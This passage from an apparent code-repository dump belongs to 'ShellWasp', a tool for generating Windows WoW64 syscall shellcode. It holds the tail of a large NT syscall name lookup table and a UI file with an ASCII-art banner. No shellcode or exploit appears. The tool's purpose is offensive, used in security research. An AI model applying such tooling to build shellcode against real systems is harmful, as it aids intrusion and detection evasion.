prepreparecomplete\":\"NtPrePrepareComplete\",\"ntpreprepareenlistment\":\"NtPrePrepareEnlistment\",\"ntpreparecomplete\":\"NtPrepareComplete\",\"ntprepareenlistment\":\"NtPrepareEnlistment\",\"ntprivilegecheck\":\"NtPrivilegeCheck\",\"ntprivilegeobjectauditalarm\":\"NtPrivilegeObjectAuditAlarm\",\"ntprivilegedserviceauditalarm\":\"NtPrivilegedServiceAuditAlarm\",\"ntpropagationcomplete\":\"NtPropagationComplete\",\"ntpropagationfailed\":\"NtPropagationFailed\",\"ntprotectvirtualmemory\":\"NtProtectVirtualMemory\",\"ntpsscapturevaspacebulk\":\"NtPssCaptureVaSpaceBulk\",\"ntpulseevent\":\"NtPulseEvent\",\"ntqueryattributesfile\":\"NtQueryAttributesFile\",\"ntqueryauxiliarycounterfrequency\":\"NtQueryAuxiliaryCounterFrequency\",\"ntquerybootentryorder\":\"NtQueryBootEntryOrder\",\"ntquerybootoptions\":\"NtQueryBootOptions\",\"ntquerydebugfilterstate\":\"NtQueryDebugFilterState\",\"ntquerydefaultlocale\":\"NtQueryDefaultLocale\",\"ntquerydefaultuilanguage\":\"NtQueryDefaultUILanguage\",\"ntquerydirectoryfile\":\"NtQueryDirectoryFile\",\"ntquerydirectoryfileex\":\"NtQueryDirectoryFileEx\",\"ntquerydirectoryobject\":\"NtQueryDirectoryObject\",\"ntquerydriverentryorder\":\"NtQueryDriverEntryOrder\",\"ntqueryeafile\":\"NtQueryEaFile\",\"ntqueryevent\":\"NtQueryEvent\",\"ntqueryfullattributesfile\":\"NtQueryFullAttributesFile\",\"ntqueryinformationatom\":\"NtQueryInformationAtom\",\"ntqueryinformationbyname\":\"NtQueryInformationByName\",\"ntqueryinformationenlistment\":\"NtQueryInformationEnlistment\",\"ntqueryinformationfile\":\"NtQueryInformationFile\",\"ntqueryinformationjobobject\":\"NtQueryInformationJobObject\",\"ntqueryinformationport\":\"NtQueryInformationPort\",\"ntqueryinformationprocess\":\"NtQueryInformationProcess\",\"ntqueryinformationresourcemanager\":\"NtQueryInformationResourceManager\",\"ntqueryinformationthread\":\"NtQueryInformationThread\",\"ntqueryinformationtoken\":\"NtQueryInformationToken\",\"ntqueryinformationtransaction\":\"NtQueryInformationTransaction\",\"ntqueryinformationtransactionmanager\":\"NtQueryInformationTransactionManager\",\"ntqueryinformationworkerfactory\":\"NtQueryInformationWorkerFactory\",\"ntqueryinstalluilanguage\":\"NtQueryInstallUILanguage\",\"ntqueryintervalprofile\":\"NtQueryIntervalProfile\",\"ntqueryiocompletion\":\"NtQueryIoCompletion\",\"ntqueryioringcapabilities\":\"NtQueryIoRingCapabilities\",\"ntquerykey\":\"NtQueryKey\",\"ntquerylicensevalue\":\"NtQueryLicenseValue\",\"ntquerymultiplevaluekey\":\"NtQueryMultipleValueKey\",\"ntquerymutant\":\"NtQueryMutant\",\"ntqueryobject\":\"NtQueryObject\",\"ntqueryopensubkeys\":\"NtQueryOpenSubKeys\",\"ntqueryopensubkeysex\":\"NtQueryOpenSubKeysEx\",\"ntqueryperformancecounter\":\"NtQueryPerformanceCounter\",\"ntqueryportinformationprocess\":\"NtQueryPortInformationProcess\",\"ntqueryquotainformationfile\":\"NtQueryQuotaInformationFile\",\"ntquerysection\":\"NtQuerySection\",\"ntquerysecurityattributestoken\":\"NtQuerySecurityAttributesToken\",\"ntquerysecurityobject\":\"NtQuerySecurityObject\",\"ntquerysecuritypolicy\":\"NtQuerySecurityPolicy\",\"ntquerysemaphore\":\"NtQuerySemaphore\",\"ntquerysymboliclinkobject\":\"NtQuerySymbolicLinkObject\",\"ntquerysystemenvironmentvalue\":\"NtQuerySystemEnvironmentValue\",\"ntquerysystemenvironmentvalueex\":\"NtQuerySystemEnvironmentValueEx\",\"ntquerysysteminformation\":\"NtQuerySystemInformation\",\"ntquerysysteminformationex\":\"NtQuerySystemInformationEx\",\"ntquerytimer\":\"NtQueryTimer\",\"ntquerytimerresolution\":\"NtQueryTimerResolution\",\"ntqueryvaluekey\":\"NtQueryValueKey\",\"ntqueryvirtualmemory\":\"NtQueryVirtualMemory\",\"ntqueryvolumeinformationfile\":\"NtQueryVolumeInformationFile\",\"ntquerywnfstatedata\":\"NtQueryWnfStateData\",\"ntquerywnfstatenameinformation\":\"NtQueryWnfStateNameInformation\",\"ntqueueapcthread\":\"NtQueueApcThread\",\"ntqueueapcthreadex\":\"NtQueueApcThreadEx\",\"ntqueueapcthreadex2\":\"NtQueueApcThreadEx2\",\"ntraiseexception\":\"NtRaiseException\",\"ntraiseharderror\":\"NtRaiseHardError\",\"ntreadfile\":\"NtReadFile\",\"ntreadfilescatter\":\"NtReadFileScatter\",\"ntreadonlyenlistment\":\"NtReadOnlyEnlistment\",\"ntreadrequestdata\":\"NtReadRequestData\",\"ntreadvirtualmemory\":\"NtReadVirtualMemory\",\"ntreadvirtualmemoryex\":\"NtReadVirtualMemoryEx\",\"ntrecoverenlistment\":\"NtRecoverEnlistment\",\"ntrecoverresourcemanager\":\"NtRecoverResourceManager\",\"ntrecovertransactionmanager\":\"NtRecoverTransactionManager\",\"ntregisterprotocoladdressinformation\":\"NtRegisterProtocolAddressInformation\",\"ntregisterthreadterminateport\":\"NtRegisterThreadTerminatePort\",\"ntreleasekeyedevent\":\"NtReleaseKeyedEvent\",\"ntreleasemutant\":\"NtReleaseMutant\",\"ntreleasesemaphore\":\"NtReleaseSemaphore\",\"ntreleaseworkerfactoryworker\":\"NtReleaseWorkerFactoryWorker\",\"ntremoveiocompletion\":\"NtRemoveIoCompletion\",\"ntremoveiocompletionex\":\"NtRemoveIoCompletionEx\",\"ntremoveprocessdebug\":\"NtRemoveProcessDebug\",\"ntrenamekey\":\"NtRenameKey\",\"ntrenametransactionmanager\":\"NtRenameTransactionManager\",\"ntreplacekey\":\"NtReplaceKey\",\"ntreplacepartitionunit\":\"NtReplacePartitionUnit\",\"ntreplyport\":\"NtReplyPort\",\"ntreplywaitreceiveport\":\"NtReplyWaitReceivePort\",\"ntreplywaitreceiveportex\":\"NtReplyWaitReceivePortEx\",\"ntreplywaitreplyport\":\"NtReplyWaitReplyPort\",\"ntrequestport\":\"NtRequestPort\",\"ntrequestwaitreplyport\":\"NtRequestWaitReplyPort\",\"ntresetevent\":\"NtResetEvent\",\"ntresetwritewatch\":\"NtResetWriteWatch\",\"ntrestorekey\":\"NtRestoreKey\",\"ntresumeprocess\":\"NtResumeProcess\",\"ntresumethread\":\"NtResumeThread\",\"ntrevertcontainerimpersonation\":\"NtRevertContainerImpersonation\",\"ntrollbackcomplete\":\"NtRollbackComplete\",\"ntrollbackenlistment\":\"NtRollbackEnlistment\",\"ntrollbackregistrytransaction\":\"NtRollbackRegistryTransaction\",\"ntrollbacktransaction\":\"NtRollbackTransaction\",\"ntrollforwardtransactionmanager\":\"NtRollforwardTransactionManager\",\"ntsavekey\":\"NtSaveKey\",\"ntsavekeyex\":\"NtSaveKeyEx\",\"ntsavemergedkeys\":\"NtSaveMergedKeys\",\"ntsecureconnectport\":\"NtSecureConnectPort\",\"ntserializeboot\":\"NtSerializeBoot\",\"ntsetbootentryorder\":\"NtSetBootEntryOrder\",\"ntsetbootoptions\":\"NtSetBootOptions\",\"ntsetcachedsigninglevel\":\"NtSetCachedSigningLevel\",\"ntsetcachedsigninglevel2\":\"NtSetCachedSigningLevel2\",\"ntsetcontextthread\":\"NtSetContextThread\",\"ntsetdebugfilterstate\":\"NtSetDebugFilterState\",\"ntsetdefaultharderrorport\":\"NtSetDefaultHardErrorPort\",\"ntsetdefaultlocale\":\"NtSetDefaultLocale\",\"ntsetdefaultuilanguage\":\"NtSetDefaultUILanguage\",\"ntsetdriverentryorder\":\"NtSetDriverEntryOrder\",\"ntseteafile\":\"NtSetEaFile\",\"ntsetevent\":\"NtSetEvent\",\"ntseteventboostpriority\":\"NtSetEventBoostPriority\",\"ntsethigheventpair\":\"NtSetHighEventPair\",\"ntsethighwaitloweventpair\":\"NtSetHighWaitLowEventPair\",\"ntsetirtimer\":\"NtSetIRTimer\",\"ntsetinformationdebugobject\":\"NtSetInformationDebugObject\",\"ntsetinformationenlistment\":\"NtSetInformationEnlistment\",\"ntsetinformationfile\":\"NtSetInformationFile\",\"ntsetinformationioring\":\"NtSetInformationIoRing\",\"ntsetinformationjobobject\":\"NtSetInformationJobObject\",\"ntsetinformationkey\":\"NtSetInformationKey\",\"ntsetinformationobject\":\"NtSetInformationObject\",\"ntsetinformationprocess\":\"NtSetInformationProcess\",\"ntsetinformationresourcemanager\":\"NtSetInformationResourceManager\",\"ntsetinformationsymboliclink\":\"NtSetInformationSymbolicLink\",\"ntsetinformationthread\":\"NtSetInformationThread\",\"ntsetinformationtoken\":\"NtSetInformationToken\",\"ntsetinformationtransaction\":\"NtSetInformationTransaction\",\"ntsetinformationtransactionmanager\":\"NtSetInformationTransactionManager\",\"ntsetinformationvirtualmemory\":\"NtSetInformationVirtualMemory\",\"ntsetinformationworkerfactory\":\"NtSetInformationWorkerFactory\",\"ntsetintervalprofile\":\"NtSetIntervalProfile\",\"ntsetiocompletion\":\"NtSetIoCompletion\",\"ntsetiocompletionex\":\"NtSetIoCompletionEx\",\"ntsetldtentries\":\"NtSetLdtEntries\",\"ntsetloweventpair\":\"NtSetLowEventPair\",\"ntsetlowwaithigheventpair\":\"NtSetLowWaitHighEventPair\",\"ntsetquotainformationfile\":\"NtSetQuotaInformationFile\",\"ntsetsecurityobject\":\"NtSetSecurityObject\",\"ntsetsystemenvironmentvalue\":\"NtSetSystemEnvironmentValue\",\"ntsetsystemenvironmentvalueex\":\"NtSetSystemEnvironmentValueEx\",\"ntsetsysteminformation\":\"NtSetSystemInformation\",\"ntsetsystempowerstate\":\"NtSetSystemPowerState\",\"ntsetsystemtime\":\"NtSetSystemTime\",\"ntsetthreadexecutionstate\":\"NtSetThreadExecutionState\",\"ntsettimer\":\"NtSetTimer\",\"ntsettimer2\":\"NtSetTimer2\",\"ntsettimerex\":\"NtSetTimerEx\",\"ntsettimerresolution\":\"NtSetTimerResolution\",\"ntsetuuidseed\":\"NtSetUuidSeed\",\"ntsetvaluekey\":\"NtSetValueKey\",\"ntsetvolumeinformationfile\":\"NtSetVolumeInformationFile\",\"ntsetwnfprocessnotificationevent\":\"NtSetWnfProcessNotificationEvent\",\"ntshutdownsystem\":\"NtShutdownSystem\",\"ntshutdownworkerfactory\":\"NtShutdownWorkerFactory\",\"ntsignalandwaitforsingleobject\":\"NtSignalAndWaitForSingleObject\",\"ntsinglephasereject\":\"NtSinglePhaseReject\",\"ntstartprofile\":\"NtStartProfile\",\"ntstopprofile\":\"NtStopProfile\",\"ntsubmitioring\":\"NtSubmitIoRing\",\"ntsubscribewnfstatechange\":\"NtSubscribeWnfStateChange\",\"ntsuspendprocess\":\"NtSuspendProcess\",\"ntsuspendthread\":\"NtSuspendThread\",\"ntsystemdebugcontrol\":\"NtSystemDebugControl\",\"ntterminateenclave\":\"NtTerminateEnclave\",\"ntterminatejobobject\":\"NtTerminateJobObject\",\"ntterminateprocess\":\"NtTerminateProcess\",\"ntterminatethread\":\"NtTerminateThread\",\"nttestalert\":\"NtTestAlert\",\"ntthawregistry\":\"NtThawRegistry\",\"ntthawtransactions\":\"NtThawTransactions\",\"nttracecontrol\":\"NtTraceControl\",\"nttraceevent\":\"NtTraceEvent\",\"nttranslatefilepath\":\"NtTranslateFilePath\",\"ntumsthreadyield\":\"NtUmsThreadYield\",\"ntunloaddriver\":\"NtUnloadDriver\",\"ntunloadkey\":\"NtUnloadKey\",\"ntunloadkey2\":\"NtUnloadKey2\",\"ntunloadkeyex\":\"NtUnloadKeyEx\",\"ntunlockfile\":\"NtUnlockFile\",\"ntunlockvirtualmemory\":\"NtUnlockVirtualMemory\",\"ntunmapviewofsection\":\"NtUnmapViewOfSection\",\"ntunmapviewofsectionex\":\"NtUnmapViewOfSectionEx\",\"ntunsubscribewnfstatechange\":\"NtUnsubscribeWnfStateChange\",\"ntupdatewnfstatedata\":\"NtUpdateWnfStateData\",\"ntvdmcontrol\":\"NtVdmControl\",\"ntwaitforalertbythreadid\":\"NtWaitForAlertByThreadId\",\"ntwaitfordebugevent\":\"NtWaitForDebugEvent\",\"ntwaitforkeyedevent\":\"NtWaitForKeyedEvent\",\"ntwaitformultipleobjects\":\"NtWaitForMultipleObjects\",\"ntwaitformultipleobjects32\":\"NtWaitForMultipleObjects32\",\"ntwaitforsingleobject\":\"NtWaitForSingleObject\",\"ntwaitforworkviaworkerfactory\":\"NtWaitForWorkViaWorkerFactory\",\"ntwaithigheventpair\":\"NtWaitHighEventPair\",\"ntwaitloweventpair\":\"NtWaitLowEventPair\",\"ntworkerfactoryworkerready\":\"NtWorkerFactoryWorkerReady\",\"ntwritefile\":\"NtWriteFile\",\"ntwritefilegather\":\"NtWriteFileGather\",\"ntwriterequestdata\":\"NtWriteRequestData\",\"ntwritevirtualmemory\":\"NtWriteVirtualMemory\",\"ntyieldexecution\":\"NtYieldExecution\",\"rtlgetnativesysteminformation\":\"RtlGetNativeSystemInformation\"}\r\n# Notes:\r\n # Everything seems to be STATUS_SUCCESS, NTSTATUS\r\n # Do we need to put all of return values in an output variable instead of eax\r\n # If so, how do we automagically determine which variable is to be used for output\r\n" }, { "path": "start/ui.py", "content": "import colorama\r\n\r\ncolorama.init()\r\n\r\n\r\nred ='\\u001b[31;1m'\r\ngre = '\\u001b[32;1m'\r\nyel = '\\u001b[33;1m'\r\nblu = '\\u001b[34;1m'\r\nmag = '\\u001b[35;1m'\r\ncya = '\\u001b[36;1m'\r\nwhi = '\\u001b[37m'\r\nres = '\\u001b[0m'\r\nres2 = '\\u001b[0m'\r\n\r\n\r\ndef showOptions():\r\n\tpass\r\n\r\ndef splash():\r\n\r\n\r\n\tsplash=yel+\"\"\"\r\n\r\n \" , ,\r\n \", ,\r\n \"\" _---. ..;%%%;, .\r\n \"\" .\", , .==% %%%%%%% ' .\r\n \"\", %%% =%% %%%%%%; ; ;-_\r\n %; %%%%% .;%;%%%\"%p ---; _ '-_\r\n %; %%%%% __;%%;p/; O --_ \"-,_\r\n q; %%% /v \\;%p ;%%%%%;--__ \"'-__'-.__\t\t\t\t\t\r\n //\\\\\" // \\ % ;%%%%%%%;',/%\\_ __ \"'-_'\\__\t\t\t\t\t\t\r\n \\ / // \\/ ;%% %; %;/\\%%%%;;;;\\ \"- _\\\t\t\t\t\t\r\n ,\" %; %%; %%;;' ';% -\\-__\t\t\t\t\r\n -=\\=\" __% %%;_ |;; %%%\\ \\ \t\t\t\t\r\n _/ _= \\==_;;,_ %%%; % -_ / \t\t\t\t\r\n / /- =%- ;%%%%; %%; \"--__/\t\r\n //= ==%-%%; %; %\t\t\t\t\r\n / _=_- d ;%; ;%; :F_P:\t\t\r\n \\ =,-\" d%%; ;%%;\t\t\t\t\r\n // % ;%%;\t\t\t\t\r\n // d%%%\"\t\t\t\t\r\n \\ %%\t\t\t\t\t\t\r\n v\t\t\t\t\t\t\t\"\"\"+res\r\n\tsplash2=cya+\"\"\" _____ _ _ ___ __ \r\n / ____| | | | \\ \\ / / \r\n | (___ | |__ ___| | |\\ \\ /\\ / /_ _ ___ _ __ \r\n \\___ \\| '_ \\ / _ \\ | | \\ \\/ \\/ / _` / __| '_ \\ \r\n ____) | | | | __/ | | \\ /\\ / (_| \\__ \\ |_) |\r\n |_____/|_| |_|\\___|_|_| \\/ \\/ \\__,_|___/ .__/ \r\n | | \r\n Syscall Shellcode for WoW64, 32-bit |_| \r\n\r\n\"\"\"+res\r\n\tauthor=yel+\" v.2.0: Bramwell Brizendine, 2022-2023\"+res\r\n\tprint (splash)\r\n\tprint (splash2)\r\n\tprint (author)\r\n\r\noldSlash2=cya+\"\"\"\r\n _____ _____ _ _ _ _ \r\n/ ___| / ___| | | | | | | \r\n\\ `--. _ _ ___ \\ `--.| |__ ___| | | ___ ___ __| | ___ \r\n `--. \\ | | / __| `--. \\ '_ \\ / _ \\ | |/ __/ _ \\ / _` |/ _ \\ \r\n/\\__/ / |_| \\__ \\/\\__/ / | | | __/ | | (_| (_) | (_| | __/ \r\n\\____/ \\__, |___/\\____/|_| |_|\\___|_|_|\\___\\___/ \\__,_|\\___| \r\n __/ | \r\n |___/ Syscall Shellcode for WoW64, 32-bit \r\n\r\n\r\n\"\"\"" } ]